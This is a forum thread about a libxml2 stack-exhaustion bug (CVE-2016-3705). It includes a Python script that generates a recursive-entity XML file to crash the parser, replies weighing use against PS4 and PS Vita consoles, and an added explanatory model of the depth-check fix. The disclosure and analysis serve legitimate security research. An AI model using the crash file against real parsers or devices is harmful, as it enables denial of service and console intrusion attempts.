
Libxml2 (2.9.3 32bit) stack overflow, possible psvita port?

dragood2
Posts: 8
Joined: Tue Sep 22, 2015 5:01 am

Libxml2 (2.9.3 32bit) stack overflow, possible psvita port?

Post by dragood2 » Wed May 04, 2016 6:05 am

Hi
This is a disclosure of the following issue that was raised a week ago
on the distro's mailing list. Both bugs on the gnome bugtracker are
currently private and should be made public now.
A couple of weeks back while working on a related bug [CVE-2016-3627] I
discovered a specially created xml file is capable of triggering a stack
overflow before libxml2 can detect it's an invalid xml file.

We raised this issue upstream on 2016-04-18 and informed them that we
would place a two week embargo on the issue in case we didn't hear back.
As of yet we have had no response so we have posted here.
https://bugzilla.gnome.org/show_bug.cgi?id=765207

We intend to keep the current embargo (ending May 3) unless we get
advised otherwise here. Below is a script to generate the xml file.

The functions xmlParserEntityCheck() and xmlParseAttValueComplex() used
to call xmlStringDecodeEntities() in a recursive context without incrementing the 'depth' counter in the parser context. Because of that omission, the parser
failed to detect attribute recursions in certain documents before running out
of stack space.

Hope this helps guide those that have the skill to take it further.
Last edited by dragood2 on Thu May 05, 2016 3:45 am, edited 2 times in total.

dragood2
Posts: 8
Joined: Tue Sep 22, 2015 5:01 am

Re: Libxml2 exploit poc, possible ps4 port?

Post by dragood2 » Wed May 04, 2016 6:06 am

Script:
#!/usr/bin/env python3
# Writes repo.xml: a DTD declaring a long chain of entities (a1 -> a2 -> a3 ...),
# then a root element whose attribute value expands &a1;.

f = open('repo.xml', 'w')

f.write("<!DOCTYPE a [ ")

i = 1

# each entity's replacement text references the next entity in the chain
while i < 30000:
    f.write("<!ENTITY a" + str(i) + " \"&a" + str(i+1) + ";\">")
    i = i + 1

# final entity referring back to a1, then the root element with the attribute that starts the expansion
f.write("<!ENTITY a" + str(i+1) + " \"&a1;\">]> <bruces bogans=\"&a1;\">")

f.close()
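To make the mechanism in the disclosure concrete (the recursive decode path that never incremented the parser's 'depth' counter, and the script's chained entity declarations), here is an added Python model. It is not libxml2's code and not from this thread's author: one expander recurses with no depth accounting and runs out of interpreter stack on a looped chain of the same shape the script produces, the other increments a depth counter on every nested expansion and refuses past a limit, which is what the upstream fix adds to the recursive path. The DTD subset handled by the regexes, the 40-level limit, and all function names are assumptions chosen for illustration; every input is constructed inline.

```python
import re

# Regexes for the subset of DTD syntax this model understands (assumption: internal
# general entities with double-quoted values, as in the generator script in this thread).
ENTITY_RE = re.compile(r'<!ENTITY\s+(\w+)\s+"([^"]*)"\s*>')
REF_RE = re.compile(r'&(\w+);')


class EntityDepthExceeded(Exception):
    """Raised when nested entity expansion goes past the configured limit."""


def parse_entities(dtd):
    """Collect name -> replacement text for every entity declared in the DTD."""
    return dict(ENTITY_RE.findall(dtd))


def expand_unchecked(name, entities):
    """Expand &name; recursively with no depth accounting.

    This is the shape of the omission the disclosure describes: the recursive
    call never bumps a depth counter, so a looped chain recurses until the
    stack is exhausted (Python reports that as RecursionError).
    """
    return REF_RE.sub(lambda m: expand_unchecked(m.group(1), entities), entities[name])


def expand_checked(name, entities, depth=0, max_depth=40):
    """Expand &name; while incrementing 'depth' on every nested expansion.

    The limit of 40 is an illustrative choice for this model. An entity that
    is referenced but never declared is reported instead of being expanded.
    """
    if depth > max_depth:
        raise EntityDepthExceeded("entity nesting deeper than %d at &%s;" % (max_depth, name))
    if name not in entities:
        raise KeyError("undefined entity &%s;" % name)
    return REF_RE.sub(
        lambda m: expand_checked(m.group(1), entities, depth + 1, max_depth),
        entities[name],
    )


def make_chain_dtd(n):
    """Constructed input: entities a1 -> a2 -> ... -> an -> a1, a closed loop."""
    parts = ['<!ENTITY a%d "&a%d;">' % (i, i + 1) for i in range(1, n)]
    parts.append('<!ENTITY a%d "&a1;">' % n)
    return "<!DOCTYPE a [ " + "".join(parts) + " ]>"


def classify(dtd, root="a1", max_depth=40):
    """Return 'ok', 'depth-exceeded' or 'undefined-entity' for expanding &root;."""
    entities = parse_entities(dtd)
    try:
        expand_checked(root, entities, max_depth=max_depth)
    except EntityDepthExceeded:
        return "depth-exceeded"
    except KeyError:
        return "undefined-entity"
    return "ok"


def unchecked_exhausts_stack(dtd, root="a1"):
    """True if the depth-unaware expander runs out of stack on this input."""
    try:
        expand_unchecked(root, parse_entities(dtd))
    except RecursionError:
        return True
    return False


if __name__ == "__main__":
    benign = '<!DOCTYPE a [ <!ENTITY inner "x"> <!ENTITY outer "&inner;&inner;"> ]>'
    print(expand_checked("outer", parse_entities(benign)))   # xx
    print(classify(make_chain_dtd(5)))                        # depth-exceeded
    print(unchecked_exhausts_stack(make_chain_dtd(5)))        # True
```

The point of the two expanders sitting side by side is that the depth-checked version turns an unbounded recursion into an ordinary parse error long before any stack limit is reached, which is exactly the failure the patched libxml2 reports instead of crashing. The regexes here cover only the trivial DTD subset used by the chain, so the model is a teaching aid, not a substitute for a real parser's entity handling.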

wololo
Site Admin
Posts: 3616
Joined: Wed Oct 15, 2008 12:42 am
Location: Japan

Re: Libxml2 exploit poc, possible ps4 port?

Post by wololo » Wed May 04, 2016 9:56 pm

Thanks.
It would be interesting to understand where the PS4 uses libxml2. I seem to recall lots of the data coming from the servers to display online information might be in xml format, wondering if it's encrypted though (in which case a proxy to serve the file for tests might not be enough). How about the browser?

Appreciate if people chime in on this one. There's a file to repro on the bugzilla link, for those too lazy to run the script from dragood2 :)
If you need US PSN Codes, this technique is what I recommend.

Looking for guest bloggers and news hunters here at wololo.net, PM me!

lazydog2055
Posts: 1
Joined: Wed May 04, 2016 11:40 pm

Re: Libxml2 exploit poc, possible ps4 port?

Post by lazydog2055 » Thu May 05, 2016 12:02 am

looks like there was also an xml exploit in ios and osx. http://www.cvedetails.com/cve/CVE-2016-1762/

I remember with the beta firmwares Sony would push a special xml to the consoles telling them to download the fw based off of some info (likely console id). With updates they also use an xml referred from a link that a proxy would be able to see. If we instead point it to the xml in question ??? Might give this a try if I can set Charles up properly. It seems too simple and wouldn't surprise me if the Web browser comes to be key.

wololo
Site Admin
Posts: 3616
Joined: Wed Oct 15, 2008 12:42 am
Location: Japan

Re: Libxml2 (2.9.3 32bit) stack overflow, possible psvita p

Post by wololo » Fri May 06, 2016 4:26 pm

Please make sure to always mention your sources when copy/pasting other people's stuff!
The source for reference: http://seclists.org/oss-sec/2016/q2/191

xyz
Posts: 61
Joined: Thu Jan 20, 2011 7:06 pm

Re: Libxml2 (2.9.3 32bit) stack overflow, possible psvita p

Post by xyz » Fri May 06, 2016 8:30 pm

it's useless

wololo
Site Admin
Posts: 3616
Joined: Wed Oct 15, 2008 12:42 am
Location: Japan

Re: Libxml2 (2.9.3 32bit) stack overflow, possible psvita p

Post by wololo » Fri May 06, 2016 8:43 pm

Can you detail why? Stack Protector, but besides that?

xyz
Posts: 61
Joined: Thu Jan 20, 2011 7:06 pm

Re: Libxml2 (2.9.3 32bit) stack overflow, possible psvita p

Post by xyz » Fri May 06, 2016 8:48 pm

It's stack exhaustion due to high recursion depth. As you can see https://access.redhat.com/security/cve/cve-2016-3705 https://access.redhat.com/security/cve/cve-2016-3627 both bugs only have availability impact, i.e. it's a DoS.

wololo
Site Admin
Posts: 3616
Joined: Wed Oct 15, 2008 12:42 am
Location: Japan

Re: Libxml2 (2.9.3 32bit) stack overflow, possible psvita p

Post by wololo » Fri May 06, 2016 8:51 pm

Thanks

Zecoxao
Posts: 281
Joined: Mon Sep 27, 2010 7:27 pm

Re: Libxml2 (2.9.3 32bit) stack overflow, possible psvita p

Post by Zecoxao » Sun May 15, 2016 9:11 pm

My sig is original :D
